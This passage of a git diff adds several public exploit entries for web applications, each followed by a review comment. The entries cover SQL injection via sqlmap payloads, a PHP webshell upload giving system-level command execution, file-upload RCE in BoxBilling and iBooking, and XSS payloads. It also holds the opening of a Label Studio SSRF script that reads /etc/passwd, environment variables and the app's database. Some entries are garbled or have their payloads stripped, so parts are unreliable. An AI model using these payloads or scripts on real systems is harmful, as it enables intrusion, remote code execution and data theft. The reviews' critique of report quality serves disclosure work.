/signup?redirectUri='"()%26%25
\ No newline at end of file
diff --git a/exploits/php/webapps/51103.txt b/exploits/php/webapps/51103.txt
new file mode 100644
index 000000000..bdbd8e1ca
--- /dev/null
+++ b/exploits/php/webapps/51103.txt
@@ -0,0 +1,343 @@
+# Exploit Title: Online shopping system advanced 1.0 - Multiple
+Vulnerabilities
+# Discovery by: Rafael Pedrero
+# Discovery Date: 2020-09-24
+# Vendor Homepage:
+https://github.com/PuneethReddyHC/online-shopping-system-advanced
+# Software Link :
+https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
+# Tested Version: 1.0
+# Tested on: Windows 10 using XAMPP / Linux Ubuntu server 18.04 + Apache +
+php 5.X/7.X + MySQL
+
+# Recap: SQLi = 2, RCE = 1, stored XSS = 2, reflected XSS = 2: 7
+vulnerabilities
+
+# Vulnerability Type: SQL Injection - #1
+
+CVSS v3: 9.8
+CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+CWE: CWE-89
+
+Vulnerability description: Online shopping system advanced 1.0 allows SQL
+injection via the admin/edit_user.php, user_id parameter.
+
+Proof of concept:
+
+Save this content in a file:
+
+POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Content-Type: multipart/form-data;
+boundary=---------------------------120411781422335
+Content-Length: 489
+Origin: http://127.0.0.1
+Connection: keep-alive
+Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
+Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
+Upgrade-Insecure-Requests: 1
+Host: 127.0.0.1
+
+-----------------------------120411781422335
+Content-Disposition: form-data; name="user_id"
+
+25
+-----------------------------120411781422335
+Content-Disposition: form-data; name="email"
+
+otheruser@gmail.com
+-----------------------------120411781422335
+Content-Disposition: form-data; name="password"
+
+puneeth@123
+-----------------------------120411781422335
+Content-Disposition: form-data; name="btn_save"
+
+
+-----------------------------120411781422335--
+
+
+And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p user_id
+
+(custom) POST parameter 'MULTIPART user_id' is vulnerable. Do you want to
+keep testing the others (if any)? [y/N]
+sqlmap identified the following injection point(s) with a total of 115
+HTTP(s) requests:
+---
+Parameter: MULTIPART user_id ((custom) POST)
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: -----------------------------120411781422335
+Content-Disposition: form-data; name="user_id"
+
+25' AND SLEEP(5) AND 'HGWF'='HGWF
+-----------------------------120411781422335
+Content-Disposition: form-data; name="email"
+
+otheruser@gmail.com
+-----------------------------120411781422335
+Content-Disposition: form-data; name="password"
+
+puneeth@123
+-----------------------------120411781422335
+Content-Disposition: form-data; name="btn_save"
+
+
+-----------------------------120411781422335--
+---
+[16:25:28] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.38, PHP 5.6.40
+back-end DBMS: MySQL >= 5.0.12
+
+
+# Vulnerability Type: SQL Injection - #2
+
+CVSS v3: 9.8
+CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+CWE: CWE-89
+
+Vulnerability description: Online shopping system advanced 1.0 allows SQL
+injection via the action.php, proId parameter.
+
+Proof of concept:
+
+Save this content in a file:
+
+POST http://127.0.0.1/online/action.php HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: */*
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 49
+Origin: http://127.0.0.1
+Connection: keep-alive
+Referer: http://127.0.0.1/online/
+Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
+Host: 127.0.0.1
+
+addToCart=1&proId=70
+
+
+And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p proId
+
+POST parameter 'proId' is vulnerable. Do you want to keep testing the
+others (if any)? [y/N]
+sqlmap identified the following injection point(s) with a total of 72
+HTTP(s) requests:
+---
+Parameter: proId (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: addToCart=1&proId=70' AND 7704=7704 AND 'IGsd'='IGsd
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: addToCart=1&proId=70' AND SLEEP(5) AND 'pAwv'='pAwv
+---
+[16:03:38] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.38, PHP 5.6.40
+back-end DBMS: MySQL >= 5.0.12
+
+
+# Vulnerability Type: Remote Command Execution (RCE)
+
+CVSS v3: 9.8
+CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+CWE: CWE-434
+
+Vulnerability description: File Restriction Bypass vulnerabilities were
+found in Online shopping system advanced v1.0. This allows for an
+authenticated user to potentially obtain RCE via webshell.
+
+Proof of concept:
+
+1. Go the add product >> (admin/add_product.php)
+2.- Select product image and load a valid image.
+3. Turn Burp/ZAP Intercept On
+4. Select webshell - ex: shell.php
+5. Alter request in the upload...
+ Update 'filename' to desired extension. ex: shell.php
+ Not neccesary change content type to 'image/png'
+
+Example exploitation request:
+
+====================================================================================================
+
+POST http://127.0.0.1/online/admin/add_product.php HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Content-Type: multipart/form-data;
+boundary=---------------------------184982084830387
+Content-Length: 960
+Origin: http://127.0.0.1
+Connection: keep-alive
+Referer: http://127.0.0.1/online/admin/add_product.php
+Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
+Upgrade-Insecure-Requests: 1
+Host: 127.0.0.1
+
+-----------------------------184982084830387
+Content-Disposition: form-data; name="product_name"
+
+demo2
+-----------------------------184982084830387
+Content-Disposition: form-data; name="details"
+
+demo2
+-----------------------------184982084830387
+Content-Disposition: form-data; name="picture"; filename="shell.php"
+Content-Type: image/gif
+
+";system($_REQUEST['cmd']);echo "" ?>
+-----------------------------184982084830387
+Content-Disposition: form-data; name="price"
+
+1
+-----------------------------184982084830387
+Content-Disposition: form-data; name="product_type"
+
+1
+-----------------------------184982084830387
+Content-Disposition: form-data; name="brand"
+
+1
+-----------------------------184982084830387
+Content-Disposition: form-data; name="tags"
+
+Summet
+-----------------------------184982084830387
+Content-Disposition: form-data; name="submit"
+
+
+-----------------------------184982084830387--
+
+====================================================================================================
+
+6. To view the webshell path go to Product List (admin/cosmetics_list.php)
+7. Send the request and visit your new webshell
+ Ex:
+http://127.0.0.1/online/product_images/1600959116_shell.php?cmd=whoami
+ nt authority\system
+
+# Vulnerability Type: stored Cross-Site Scripting (XSS) - #1
+
+CVSS v3: 6.5
+CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+CWE: CWE-79
+
+Vulnerability description: Online shopping system advanced v1.0, does not
+sufficiently encode user-controlled inputs, resulting in a stored
+Cross-Site Scripting (XSS) vulnerability via the admin/edit_user.php, in
+multiple parameter.
+
+Proof of concept:
+
+Stored:
+
+POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Content-Type: multipart/form-data;
+boundary=---------------------------120411781422335
+Content-Length: 496
+Origin: http://127.0.0.1
+Connection: keep-alive
+Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
+Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
+Upgrade-Insecure-Requests: 1
+Host: 127.0.0.1
+
+-----------------------------120411781422335
+Content-Disposition: form-data; name="user_id"
+
+25
+-----------------------------120411781422335
+Content-Disposition: form-data; name="email"
+
+otheruser@gmail.com
+-----------------------------120411781422335
+Content-Disposition: form-data; name="password"
+
+
+-----------------------------120411781422335
+Content-Disposition: form-data; name="btn_save"
+
+
+-----------------------------120411781422335--
+
+
+# Vulnerability Type: stored Cross-Site Scripting (XSS) - #2
+
+CVSS v3: 6.5
+CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+CWE: CWE-79
+
+Vulnerability description: Online shopping system advanced v1.0, does not
+sufficiently encode user-controlled inputs, resulting in a stored
+Cross-Site Scripting (XSS) vulnerability via the admin/add_user.php, in
+multiple parameter.
+
+Proof of concept:
+
+Stored:
+
+POST http://127.0.0.1/online/admin/add_user.php HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 192
+Origin: http://127.0.0.1
+Connection: keep-alive
+Referer: http://127.0.0.1/online/admin/add_user.php
+Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
+Upgrade-Insecure-Requests: 1
+Host: 127.0.0.1
+
+first_name=demo&last_name=demo&email=demo%40localhost.inet&user_password=demo&mobile=5555555555&address1=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E&address2=here+5&btn_save=
+
+
+# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #1
+
+CVSS v3: 6.1
+CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+CWE: CWE-79
+
+Vulnerability description: Online shopping system advanced v1.0, does not
+sufficiently encode user-controlled inputs, resulting in a reflected
+Cross-Site Scripting (XSS) vulnerability via the admin/clothes_list.php, in
+page parameter.
+
+Proof of concept:
+
+Reflected:
+
+http://127.0.0.1/online/admin/clothes_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E
+
+
+# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #2
+
+CVSS v3: 6.1
+CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+CWE: CWE-79
+
+Vulnerability description: Online shopping system advanced v1.0, does not
+sufficiently encode user-controlled inputs, resulting in a reflected
+Cross-Site Scripting (XSS) vulnerability via the admin/cosmetics_list.php,
+in page parameter.
+
+Proof of concept:
+
+Reflected:
+
+http://127.0.0.1/online/admin/cosmetics_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E
\ No newline at end of file
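Review bot: In the Remote Command Execution section the vector says `PR:N`, while the description says the upload is available to "an authenticated user" and the sample request carries a `PHPSESSID` for `admin/add_product.php`. Either change the vector to reflect the required privileges and recompute the score, or state that the page is reachable without a session. The XSS sections have a similar mismatch: the identical vector `AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` is scored 6.5 for the stored findings and 6.1 for the reflected ones, and every vector after SQL Injection #2 drops the `CVSS:` prefix. Stored XSS #1 also shows no markup in any form part (the `password` part is empty), so the affected field cannot be identified from the request as written.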
diff --git a/exploits/php/webapps/51104.txt b/exploits/php/webapps/51104.txt
new file mode 100644
index 000000000..ce845bd33
--- /dev/null
+++ b/exploits/php/webapps/51104.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Jetpack 11.4 - Cross Site Scripting (XSS)
+# Date: 2022-10-19
+# Author: Behrouz Mansoori
+# Software Link: https://wordpress.org/plugins/jetpack
+# Version: 11.4
+# Tested on: Mac m1
+# CVE: N/A
+
+1. Description:
+This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
+
+2. Proof of Concept:
+http://localhost/modules/contact-form/grunion-form-view.php?post_id=
\ No newline at end of file
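Review bot: The description does not match the proof of concept. It refers to a "slider import search feature and tab parameter via plugin settings", while the only URL given is `modules/contact-form/grunion-form-view.php?post_id=` with nothing after `post_id=`. State which parameter is reflected and in which Jetpack module, and say whether a fixed release exists, since `CVE: N/A` gives readers nothing else to track.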
diff --git a/exploits/php/webapps/51108.txt b/exploits/php/webapps/51108.txt
new file mode 100644
index 000000000..ba5697135
--- /dev/null
+++ b/exploits/php/webapps/51108.txt
@@ -0,0 +1,34 @@
+# Exploit Title: BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)
+# Date: 2022-09-18
+# Exploit Author: zetc0de
+# Vendor Homepage: https://www.boxbilling.org/
+# Software Link:
+https://github.com/boxbilling/boxbilling/releases/download/4.22.1.5/BoxBilling.zip
+# Version: <=4.22.1.5 (Latest)
+# Tested on: Windows 10
+# CVE : CVE-2022-3552
+# BoxBilling was vulnerable to Unrestricted File Upload.
+# In order to exploit the vulnerability, an attacker must have a valid
+authenticated session as admin on the CMS.
+# With at least 1 order of product an attacker can upload malicious file to
+hidden API endpoint that contain a webshell and get RCE
+###################################################################################
+
+
+## POC
+POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1
+Host: local.com:8089
+Content-Length: 52
+Accept: application/json, text/javascript, */*; q=0.01
+DNT: 1
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d
+Connection: close
+
+order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f>
+
+POC Video :
+https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing
\ No newline at end of file
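Review bot: The wrapped header lines (`authenticated session as admin on the CMS.` and `hidden API endpoint that contain a webshell and get RCE`) lost their leading `#`, so the metadata block is no longer uniformly commented. The text also says "at least 1 order of product" is required but never ties that to `order_id=1` in the request body, and `Version: <=4.22.1.5 (Latest)` names no fixed release. Link the advisory for CVE-2022-3552 rather than relying only on a Google Drive video as evidence.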
diff --git a/exploits/php/webapps/51110.txt b/exploits/php/webapps/51110.txt
new file mode 100644
index 000000000..e22743738
--- /dev/null
+++ b/exploits/php/webapps/51110.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)
+# Date: 2022-08-10
+# Exploit Author: Sinem Şahin
+# Vendor Homepage: https://intelliants.com/
+# Version: 4.2.1
+# Tested on: Windows & XAMPP
+
+==> Tutorial <==
+
+1- Go to the following url. => http://(HOST)/panel/fields/add
+2- Write XSS Payload into the tooltip value of the field add page.
+3- Press "Save" button.
+4- Go to the following url. => http://(HOST)/panel/members/add
+
+XSS Payload ==> "
+
+Reference: ://github.com/intelliants/subrion/issues/895
\ No newline at end of file
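Review bot: The `XSS Payload ==> "` line contains only a double quote, so the entry does not record what was placed in the tooltip field, and the `Reference:` URL is missing its scheme (`://github.com/intelliants/subrion/issues/895`). Restore the scheme on the reference, and have step 4 say what the reader should observe on `/panel/members/add`, since the tutorial ends without stating the result.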
diff --git a/exploits/php/webapps/51115.txt b/exploits/php/webapps/51115.txt
new file mode 100644
index 000000000..8552923ff
--- /dev/null
+++ b/exploits/php/webapps/51115.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting (XSS)
+# Date: 26/10/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://moodle.org/
+# Software Link: https://git.in.moodle.com/moodle
+# Version: 4.0
+# Tested on: XAMPP, Windows 10
+# Contact: https://twitter.com/dmaral3noz
+
+Description:
+
+A Cross Site Scripting (XSS) vulnerability exists in Moodle is a free and open-source Learning Management System (LMS) written in PHP and distributed under the GNU General Public License
+
+Vulnerable Code:
+
+line 111 in file "course/search.php"
+
+echo $courserenderer->search_courses($searchcriteria);
+
+
+Steps to exploit:
+1) Go to http://localhost/course/search.php
+2) Insert your payload in the "search"
+
+Proof of concept (Poc):
+The following payload will allow you to run the javascript -
+">
\ No newline at end of file
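Review bot: The `Description:` sentence is two fragments fused together ("exists in Moodle is a free and open-source ...") and never says which input is affected; the only hint is `Insert your payload in the "search"` in the steps. The proof of concept is reduced to `">`, and the quoted `echo $courserenderer->search_courses($searchcriteria);` line is a renderer call that by itself does not show where output goes unescaped. Name the parameter, give the exact build tested rather than `Version: 4.0`, and add a CVE or tracker reference if one exists.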
diff --git a/exploits/php/webapps/51116.txt b/exploits/php/webapps/51116.txt
new file mode 100644
index 000000000..ab1fc1b14
--- /dev/null
+++ b/exploits/php/webapps/51116.txt
@@ -0,0 +1,53 @@
+## Title: Social-Share-Buttons v2.2.3 - SQL Injection
+## Author: nu11secur1ty
+## Date: 09.16.2022
+## Vendor: https://wordpress.org/
+## Software: https://downloads.wordpress.org/plugin/social-share-buttons-by-supsystic.2.2.3.zip
+## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3
+
+
+## Description:
+The `project_id` parameter from the Social Share Buttons-2.2.3 on the
+WordPress-6.0.2 system appears to be vulnerable to SQL injection
+attacks.
+The malicious user can dump-steal the database, from this system and
+he can use it for very malicious purposes.
+WARNING: The attacker can retrieve all-database from this system!
+NOTE: The users of this system are NOT protected, this SQL
+vulnerability is CRITICAL!
+
+STATUS: HIGH Vulnerability
+
+[+]Payload:
+
+```mysql
+---
+Parameter: project_id (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: action=social-sharing-share&project_id=378116348' or
+'3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id=
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: action=social-sharing-share&project_id=378116348' or
+'3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND
+'KWbC'='KWbC&network_id=5&post_id=
+---
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3)
+
+## Proof and Exploit:
+[href](https://streamable.com/m9r76w)
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html and https://www.exploit-db.com/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
\ No newline at end of file
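Review bot: Severity is stated two ways in one entry, `STATUS: HIGH Vulnerability` and "this SQL vulnerability is CRITICAL!" in the NOTE line, with no CVSS vector or CWE to settle it. The `## Vendor:` field points at https://wordpress.org/ although the software link is the `social-share-buttons-by-supsystic` plugin, and the description never names the endpoint that receives `action=social-sharing-share`. Both link labels under `## Reproduce:` and `## Proof and Exploit:` are the literal text `[href]` and should describe their targets.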
diff --git a/exploits/php/webapps/51119.txt b/exploits/php/webapps/51119.txt
new file mode 100644
index 000000000..e210f33de
--- /dev/null
+++ b/exploits/php/webapps/51119.txt
@@ -0,0 +1,41 @@
+# Exploit Title: iBooking v1.0.8 - Arbitrary File Upload
+# Exploit Author: d1z1n370/oPty
+# Date: 01/11/2022
+# Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088
+# Tested on: Linux
+# Version: 1.0.8
+
+# Exploit Description:
+The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
+
+
+# PoC request
+
+POST https://localhost/dashboard/upload-new-media HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://localhost/dashboard/settings
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062
+Content-Length: 449
+Connection: close
+Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
+
+-----------------------------115904534120015298741783774062
+Content-Disposition: form-data; name="_token"
+
+kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW
+-----------------------------115904534120015298741783774062
+Content-Disposition: form-data; name="is_modal"
+
+1
+-----------------------------115904534120015298741783774062
+Content-Disposition: form-data; name="file"; filename="upload.php56"
+Content-Type: image/gif
+
+GIF89a;
+
+-----------------------------115904534120015298741783774062--
\ No newline at end of file
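Review bot: The description is generic and omits the precondition visible in the request: it posts to `/dashboard/upload-new-media` with a `PHPSESSID` cookie and a `_token` field, so an authenticated dashboard session appears to be required and should be stated. It also does not say which validation is missing (extension, MIME type or content) for `filename="upload.php56"` sent with `Content-Type: image/gif`, which is what a defender needs in order to verify a fix.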
diff --git a/exploits/php/webapps/51120.txt b/exploits/php/webapps/51120.txt
new file mode 100644
index 000000000..2ef7da05f
--- /dev/null
+++ b/exploits/php/webapps/51120.txt
@@ -0,0 +1,63 @@
+## Title: Senayan Library Management System v9.5.0 - SQL Injection
+## Author: nu11secur1ty
+## Date: 11.03.2022
+## Vendor: https://slims.web.id/web/
+## Software: https://github.com/slims/slims9_bulian/releases
+## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0
+
+## Description:
+The `keywords` parameter appears to be vulnerable to SQL injection attacks.
+A single quote was submitted in the keywords parameter, and a general
+error message was returned.
+Two single quotes were then submitted and the error message
+disappeared. The injection is confirmed manually from nu11secur1ty.
+The attacker can retrieve all information from the database of this
+system, by using this vulnerability.
+
+## STATUS: HIGH Vulnerability
+
+[+] Payload:
+
+```MySQL
+---
+Parameter: keywords (GET)
+ Type: stacked queries
+ Title: MySQL >= 5.0.12 stacked queries (comment)
+ Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT
+SLEEP(5)#
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)
+ Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))
+RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#
+---
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0)
+
+## Proof and Exploit:
+[href](https://streamable.com/63og5v)
+
+## Time spent
+`3:00`
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at
+https://packetstormsecurity.com/https://cve.mitre.org/index.html and
+https://www.exploit-db.com/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html and https://www.exploit-db.com/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
\ No newline at end of file
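Review bot: The author signature block appears twice at the end of the file, and in the first copy two URLs are run together as `https://packetstormsecurity.com/https://cve.mitre.org/index.html`; keep one copy with the links separated. In the description, the `keywords` parameter is named without the script or route that receives it, and `## STATUS: HIGH Vulnerability` is given with no CVSS vector or CWE.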
diff --git a/exploits/php/webapps/51121.txt b/exploits/php/webapps/51121.txt
new file mode 100644
index 000000000..01212e70c
--- /dev/null
+++ b/exploits/php/webapps/51121.txt
@@ -0,0 +1,67 @@
+## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS)
+## Author: nu11secur1ty
+## Date: 11.03.2022
+## Vendor: https://www.rukovoditel.net/
+## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download
+## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1
+
+## Description:
+The application is vulnerable to DOM-based cross-site scripting
+attacks. Data is read from `location.hash` and passed to
+`jQuery.parseHTML`.
+The attacker can use this vulnerability to create an unlimited number
+of accounts on this system until it crashed.
+
+## STATUS: HIGH Vulnerability - CRITICAL
+
+[+] Payload:
+
+```POST
+GET /rukovoditel/index.php?module=users/restore_password HTTP/1.1
+Host: pwnedhost.com
+Accept-Encoding: gzip, deflate
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63
+Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg;
+cookie_test=please_accept_for_session;
+app_login_redirect_to=module%3Ddashboard%2F
+Upgrade-Insecure-Requests: 1
+Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/login
+Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
+Sec-CH-UA-Platform: Windows
+Sec-CH-UA-Mobile: ?0
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1)
+
+## Proof and Exploit:
+[href](https://streamable.com/i1qmfk)
+
+## Time spent
+`3:45`
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at
+https://packetstormsecurity.com/https://cve.mitre.org/index.html and
+https://www.exploit-db.com/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html and https://www.exploit-db.com/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
\ No newline at end of file
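Review bot: The description and the evidence disagree. The entry reports DOM-based XSS from `location.hash` into `jQuery.parseHTML`, but the stated impact is creating "an unlimited number of accounts on this system until it crashed", which is not a consequence of XSS, and the block under `[+] Payload:` is a plain `GET /rukovoditel/index.php?module=users/restore_password` with no fragment or script in it (the fence is also labelled `POST`). Identify the script that reads `location.hash`, give one status instead of `HIGH Vulnerability - CRITICAL`, and remove the duplicated signature block.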
diff --git a/exploits/python/webapps/51109.txt b/exploits/python/webapps/51109.txt
new file mode 100644
index 000000000..b85a4c12e
--- /dev/null
+++ b/exploits/python/webapps/51109.txt
@@ -0,0 +1,196 @@
+# Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)
+# Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition"
+# Date: 2022-10-03
+# Exploit Author: @DeveloperNinja, IncisiveSec@protonmail.com
+# Vendor Homepage: https://github.com/heartexlabs/label-studio, https://labelstud.io/
+# Software Link: https://github.com/heartexlabs/label-studio/releases
+# Version: <=1.5.0
+# CVE : CVE-2022-36551
+# Docker Container: heartexlabs/label-studio
+
+# Server Side Request Forgery (SSRF) in the Data Import module in Heartex - Label Studio Community Edition
+# versions 1.5.0 and earlier allows an authenticated user to access arbitrary files on the system.
+# Furthermore, self-registration is enabled by default in these versions of Label Studio enabling a remote
+# attacker to create a new account and then exploit the SSRF.
+
+#
+# This exploit has been tested on Label Studio 1.5.0
+#
+
+# Exploit Usage Examples (replace with your target details):
+# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /etc/passwd
+# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /proc/self/environ
+# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /label-studio/data/label_studio.sqlite3 --out label_studio.sqlite3.sqlite3
+
+
+import json
+import argparse
+import requests
+import shutil
+from urllib.parse import urljoin
+from urllib.parse import urlparse
+requests.packages.urllib3.disable_warnings()
+
+# main function for exploit
+def main(url, filePath, writePath, username, password, shouldRegister):
+ # check if the URL is reachable
+ try:
+ r = requests.get(url, verify=False)
+ if r.status_code == 200:
+ print("[+] URL is reachable")
+ else:
+ print("[!] Error: URL is not reachable, check the URL and try again")
+ exit(1)
+
+ except requests.exceptions.RequestException as e:
+ print("[!] Error: URL is not reachable, check the URL and try again")
+ exit(1)
+
+ session = requests.Session()
+
+ login(session, url, username, password, shouldRegister)
+ print("[+] Logged in")
+ print("[+] Creating project...")
+
+ # Create a temp project
+ projectDetails = create_project(session, url)
+ print("[+] Project created, ID: {}".format(projectDetails["id"]))
+
